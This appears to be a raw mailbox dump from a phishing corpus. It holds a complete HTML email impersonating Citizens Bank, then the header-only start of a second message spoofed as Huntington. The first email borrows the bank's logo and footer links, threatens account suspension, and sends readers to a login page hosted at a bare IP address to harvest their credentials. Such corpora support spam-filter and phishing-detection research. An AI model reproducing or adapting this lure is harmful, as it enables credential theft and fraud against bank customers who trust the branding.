From: "Citizens Bank" <support@citizensbank.com>
Reply-To: support@citizensbank.com
To: "Jose" <username@domain.com>
Subject: Important Online Banking Alert
MIME-Version: 1.0 (produced by deadenlizzie 4.1)
Content-Type: multipart/alternative;
	boundary="--729860965465309416"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 125

----729860965465309416
Content-Type: text/html;
	charset="iso-4847-5"
Content-Transfer-Encoding: quoted-printable
Content-Description: pendulum application deterring

<html>
<head>
<link rel=3D"StyleSheet" href=3D"http://www.citizensbank.com/css/default.c=
ss" type=3D"text/css">
<title>Citizens Bank Online</title>
</head>
<body>
<img src=3D"http://www.citizensbank.com/img/header/cb_logo.gif">
<br><br><div style=3D"font-family: Arial, Helvetica, sans-serif; font-size=
: 8pt; line-height:13.5pt; color:666666;">
Dear valued <b>Citizens=AE</b> Bank member,
<br><br>
Due to concerns, for the safety and integrity of the online banking commun=
ity we have issued the following warning message.
<br><br>
It has come to our attention that your <b>Citizens=AE</b> account informat=
ion needs to be updated as part of our continuing commitment to protect yo=
ur account and to reduce the instance of fraud on our website. If you coul=
d please take 5-10 minutes out of your online experience and renew your re=
cords you will not run into any future problems with the online service. H=
owever, failure to confirm your records may result in your account suspens=
ion.
<br><br>
Once you have confirmed your account records your internet banking service=
 will not be interrupted and will continue as normal.
<br><br>
<b>To confirm your bank account record please <a href=3D"http://218.104.10=
0.73/CitizensBank/OnlineBanking/" target=3D"_blank">click here.</a></b>
<br><br>
Thank you for your time,
<br>
<b>Citizens=AE Financial Group.</b></div>
<br>
<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"760">
<tr>
<td width=3D"8"><img src=3D"http://www.citizensbank.com/img/template/space=
r.gif" width=3D"8" height=3D"1" alt=3D"" border=3D"0"></td>
<td width=3D"745"><img src=3D"http://www.citizensbank.com/img/template/spa=
cer.gif" width=3D"1" height=3D"11" alt=3D"" border=3D"0"></td>
<td width=3D"7"><img src=3D"http://www.citizensbank.com/img/template/space=
r.gif" width=3D"7" height=3D"1" alt=3D"" border=3D"0"></td>
</tr>
<tr>
<td rowspan=3D"3" width=3D"8"><img src=3D"http://www.citizensbank.com/img/=
template/spacer.gif" width=3D"8" height=3D"1" alt=3D"" border=3D"0"></td>
<td width=3D"745"><img src=3D"http://www.citizensbank.com/img/footer/foote=
r.gif" width=3D"745" height=3D"19" alt=3D"" border=3D"0"></td>
<td rowspan=3D"3" width=3D"7"><img src=3D"http://www.citizensbank.com/img/=
template/spacer.gif" width=3D"7" height=3D"1" alt=3D"" border=3D"0"></td>
</tr>
<tr>
<td width=3D"745" bgcolor=3D"#2B9376"><img src=3D"http://www.citizensbank.=
com/img/template/spacer.gif" width=3D"1" height=3D"22" alt=3D"" border=3D"=
0"></td>
</tr>
<tr>
<td width=3D"745" align=3D"center"><div class=3D"footer">
<a href=3D"http://www.citizensbank.com/boilerplate/privacylegal/privacy.as=
p" target=3D"_blank">Privacy</a> |
<a href=3D"http://www.citizensbank.com/boilerplate/privacylegal/security.a=
sp" target=3D"_blank">Security</a>     &copy; 2005 Citizens Financial Grou=
p.  All rights reserved.
<a href=3D"http://www.citizensbank.com/misc/termsofuse.asp" target=3D"_bla=
nk">Terms of Use</a> |
<a href=3D"http://www.citizensbank.com/tools/site_map/map.asp" target=3D"_=
blank">Site Map</a></div></td>
</tr>
</table>
</body></html>


----729860965465309416--

From accounts@huntington.com  Sun Feb 13 12:23:57 2005
Return-Path: <accounts@huntington.com>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id 50D6A53718B
	for <username@login.domain.com>; Sun, 13 Feb 2005 12:23:56 -0500 (EST)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail1.domain.com (Postfix) with ESMTP id E671F85A557
	for <username@domain.com>; Sun, 13 Feb 2005 12:15:29 -0500 (EST)
Received: by lujan.uninet.edu (Postfix)
	id 123E91BB19; Sun, 13 Feb 2005 18:23:40 +0100 (CET)
Delivered-To: user@example.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 4E10D1BB0D; Sun, 13 Feb 2005 17:23:39 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 13575-02; Sun, 13 Feb 2005 18:23:27 +0100 (CET)
Received: from compendium.ar.uninet.edu (unknown [200.69.230.3])
	by lujan.uninet.edu (Postfix) with ESMTP
	id DA1501BB0B; Sun, 13 Feb 2005 18:23:21 +0100 (CET)
Received: from mafia (unknown [80.96.225.67])
	by compendium.ar.uninet.edu (Postfix) with SMTP
	id 41D071967C5; Sun, 13 Feb 2005 14:23:04 -0300 (ART)
